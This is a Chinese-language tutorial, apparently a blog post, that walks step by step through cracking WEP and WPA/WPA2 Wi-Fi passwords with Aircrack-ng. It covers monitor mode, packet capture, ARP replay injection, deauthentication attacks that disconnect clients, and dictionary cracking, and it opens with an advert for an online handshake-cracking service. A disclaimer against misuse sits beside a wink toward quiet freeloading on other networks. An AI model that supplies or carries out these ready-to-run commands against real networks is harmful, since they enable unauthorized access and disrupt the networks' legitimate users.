使用 Aircrack-ng 破解 WEP 和 WPA/WPA2 加密的 Wi

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 握手包跑包

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

首先,我要强调不要滥用本方法来进行恶意活动或窃取Wi-Fi,因为技术本身的价值很大。学习技术的过程中,解决问题并克服困难后的成就感是无法用来蹭网的。在本过程中,我使用了自己的路由器进行测试,相信大家也能从文章中看到。因此,请不要将技术用于不良行为。

其次,欢迎使用Kali Linux的朋友们互相交流,共同进步学习。

索引:

  1. 工具

  2. 需要了解的知识

  3. 破解WEP

  4. 破解WPA/WPA2

  5. 其他

  6. Q&A

  7. 参考文章

  8. 用到的工具:

  • Airodump-ng:用于获取AP的MAC信息、连接信息以及是否握手成功。
  • Aircrack-ng:支持基于802.11协议的WEP和WPA/WPA2-PSK密码破解。
  • Aireplay-ng:用于向目标AP强制发送数据包。
  • Airmon-ng:用于开启无线网卡的监视模式。
  • Wordlists.txt:字典包。
  1. 需要了解的知识:
  • AP(Access Point):网络接入点,即我们常说的路由器。
  • MAC(Media Access Control Address):相当于网卡的身份证,MAC地址本身不能修改,但可以通过伪造MAC地址欺骗AP。
  • WEP(Wireless Encryption Protocol):一种早期的无线加密协议,容易被破解。
  • WPA/WPA2(Wi-Fi Protected Access):基于WEP更安全的加密系统。
  • Handshake(握手):类似于三次握手的过程。
  • IV(Initialization Vector):初始化向量。
  1. 破解WEP加密的Wi-Fi流程(现在基本不再使用WEP,仅作为步骤演示):
    3.1 使用iwconfig确认网卡信息,确保设备WLAN0处于被管理(Managed)模式。
    3.2 使用airmon-ng start wlan0激活网卡进入监视模式。如果遇到错误,可以先执行ifconfig wlan0mon down取消监视模式,然后执行iwconfig wlan0mon mode monitor设置为监视模式,最后执行ifconfig wlan0mon up唤醒网卡。在开始第2步之前,可以使用airmon-ng check kill命令自动检查并关闭冲突的进程。使用iwconfig查询,确认wlan0mon处于监视模式。
    3.3 使用airodump-ng wlan0mon获取附近AP的信息。记录下目标AP的MAC地址(BSSID)和频道(CH)。
    3.4 使用airodump-ng –ivs -w 文件地址 –bssid BSSID wlan0mon开始抓包,其中-w表示抓到的包保存的位置,–ivs表示只保留IVs文件。
    3.5 使用aireplay-ng -3 -b BSSID -h 客户端MAC wlan0mon向AP发送大量数据包,加快获取数据包的速度。
    3.6 如果数据包较少,可以尝试使用aireplay-ng -0 10 -a 88:25:93:5A:B5:6A -c 68:17:29:26:C3:16 wlan0mon发送数据包。
    3.7 使用aircrack-ng 01.ivs进行破解,等待破解成功。

  2. 破解WPA/WPA2加密的Wi-Fi流程:
    前面的步骤与3.1、3.2、3.3相同,确保wlan0mon处于监视模式。
    4.1 使用airodump-ng –bssid BSSID -c CH -w 文件位置 wlan0mon获取目标AP的设备信息。
    4.2 使用aireplay-ng -0 10 -a BSSID -c STATION wlan0mon向AP发送DeAuth数据包,断开已连接的客户端。
    4.3 等待握手,当在前一步发送大量数据包后,如果在airodump-ng的结果中看到握手信息(handshake: AP的MAC),则停止操作。
    4.4 使用aircrack-ng -w Wordlists.txt CAP-01.cap进行破解,等待KEY FOUND!破解成功。

  3. 其他:
    推荐使用Crunch工具生成字典。

  4. Q&A:

  • Q: 修改为监视模式(Monitor)失败。
    A: 可以尝试执行ifconfig wlan0mon down取消监视模式,然后执行iwconfig wlan0mon mode monitor设置为监视模式,最后执行ifconfig wlan0mon up唤醒网卡。在开始工作之前,可以使用airmon-ng check kill命令自动检查并关闭冲突的进程。
  • Q: 破解后无法正常上网。
    A: 执行ifconfig wlan0mon down、iwconfig wlan0mon mode managed、ifconfig wlan0mon up,将wlan0mon改回管理模式(Managed)。因为之前将wlan0mon改为监视模式(Monitor)。
  • Q: 无法握手。
    A: 尝试靠近路由器,重复发送数据包,并耐心等待。
  • Q: 无法破解。
    A: 尝试更换更强的字典包。
  • Q: 破解速度太慢。
    A: 尝试使用GPU加速或使用hashcat进行加速。

赞(0)